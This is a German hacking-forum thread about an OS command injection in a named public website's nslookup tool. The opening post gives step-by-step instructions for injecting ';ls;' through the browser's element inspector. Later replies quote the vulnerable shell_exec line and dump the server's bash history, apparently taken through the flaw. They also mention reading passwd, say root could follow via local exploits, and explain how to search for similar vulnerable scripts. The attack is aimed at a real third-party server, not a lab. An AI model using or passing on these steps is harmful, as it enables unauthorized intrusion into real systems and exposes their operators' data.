Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[OSCI]iptools.eu

- - - - -

  • Bitte melde dich an um zu Antworten
6 Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

URL:

http://www.iptools.eu/nslookup.php

Im Feld "insert domain or ip" geben wir ein:

google.de

Dann klicken wir neben "Choose type" auf das Auswahlfeld mit der rechten Maustaste und wählen "Element untersuchen" (in Firefox, IE..) aus.

Die Zeile "<option value="A">A</option>" ändern wir in"<option value=";ls;">A</option>".

Dann klicken wir auf "LOOK IT UP".

dka9si0h968gdaist.png

 


  • SecurityFlaw gefällt das

Thanked by 1 Member:
Erikson

#2
fluffybunny

fluffybunny

    Pentester

  • Premium Member
  • Likes
    23
  • 119 Beiträge
  • 7 Bedankt

sorry aber um was handelt es sich hier den eigentlich? Schaut so aus als könnte man damit die Verzeichniss Struktur von google anschauen? Ist das richtig?



#3
JohnR

JohnR

    Pentester

  • Premium Member
  • Likes
    21
  • 51 Beiträge
  • 4 Bedankt
  • Spender
  • iPhone
  • Windows, Linux, Mac OS
also ich würde "osci" mit OS Comand Injection übersetzen... und nachdem Zero-X recht anschaulich "ls" einschleust und der Interpreter es augenscheinlich verarbeitet/ausführt/ausgibt

das mit google - nein, eher die Struktur der Verzeichnisse auf dem OS des Servers...

Thanked by 1 Member:
fluffybunny

#4
fluffybunny

fluffybunny

    Pentester

  • Premium Member
  • Likes
    23
  • 119 Beiträge
  • 7 Bedankt

also könnte man damit auch verschiedene andere linux befehle ausführen lassen? ziemlich lässig, da muss ich mich mal genauer damit beschäftigen.



#5
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    212
  • 219 Beiträge
  • 185 Bedankt

Deswegen:

 

$result shell_exec("/usr/bin/nslookup -querytype=$type " escapeshellcmd($domns));

 

Super Fund wie immer Zero-X

Edit:

Schöne bashhistory:
 

cd
ls -la
sh updatemax.sh
ls -la
exit
cd
cd public_html/
ls -la
cp httpheaders.php validate_json.php
vi validate_json.php
cp validate_json.php json_beautifier.php
vi json_beautifier.php
vi whois.php
vi json_beautifier.php
vi whois.php
ll
vi httpheaders.php
vi whois.php
vi json_beautifier.php
exit
cd
cd public_html/
ll
cd
cd public_html/
vi json_beautifier.php
mv validate_json.php json_validator.php
vi json_validator.php
vi index.php
vi iplocator.php
vi subnetcalculator.php
vi ipcalculator.php
vi vi portnumbers.php
vi portnumbers.php
vi whois.php
vi nslookup.php
vi httpheaders.php
vi dnspropagation.php
vi rbl.php
vi passwordgenerator.php
vi json_beautifier.php
vi json_validator.php
vi json_beautifier.php
vi json_validator.php
uptime
free -m
cat /etc/debian_version
ubuntu-support-status
exit
cd
cd public_html/
vi json_validator.php
vi json_beautifier.php
exit
cd
cd public_html/
ll
uptime

 



#6
jmPesp

jmPesp

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    35
  • 47 Beiträge
  • 7 Bedankt
  • 826012
  • iPhone
  • Windows, Linux, Mac OS

Sehr nett  :D  zwei Fragen dazu .. warum gibt es einen User games in der passwd .. und @Zero-X wie kommt man darauf das so zu Testen (commix)? 



#7
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

@fluffybunny:
Ja es ist möglich, damit jeden Befehl auf dem System unter den Rechten des jeweiligen Users auszuführen. Unter Umständen ist es auch möglich auf dem System einen Local-Exploit auszuführen und so Root-Rechte zu erlangen.
Ich habe mal vor längerer Zeit ein Tutorial geschrieben, das sich mit der Ausnutzung dieser Sicherheitslücken beschäftigt.
https://www.toolbase...ction-tutorial/

@jmPesp:

Der User "games" ist ein Systemuser, der steht bei mehreren Systemen in der passwd-Datei.
Um solche Lücken gezielt zu finden kann man in Google beispielweise nach webbasierten whois- oder nslookup-Skripts suchen. Da ist die Wahrscheinlichkeit groß, daß man einSkript findet, das Systemfunktionen verarbeitet. Es muss aber nicht zwingend php sein, bei cgi oder asp zum Beispiel kann man auch einiges finden.
Commix kenne ich zwar, habe es bei dieser gefundenen Lücke aber nicht verwendet. Das Tool ist zwar ganz nett aber meiner Meinung nach arbeitet es nicht immer ganz zuverlässig.


  • fluffybunny und Klaus gefällt das

Thanked by 2 Members:
jmPesp , Dean36


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 43 user(s)


    _)_, 007, aaaaaa, Alpha63, bones, Caruso, chexum, CM1, cyb3rfly, CyberFlash, Dean36, dvalar, easysurfer, Erikson, eXalT, FatalityMods, fluffybunny, Framerater, h04x, ice, jmPesp, JohnR, kiwitone, Klaus, Kraenk, MarkSantos, Mini Rick, nong_dan, PadX18, Platin, ProHex, Pseudo, Psykoon303, R3s1stanc3, Rogerlopensio, SecurityFlaw, SkullSplitter, sub0, Toskom4n, VerZus, WarRaZzer, Wizkalifa, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.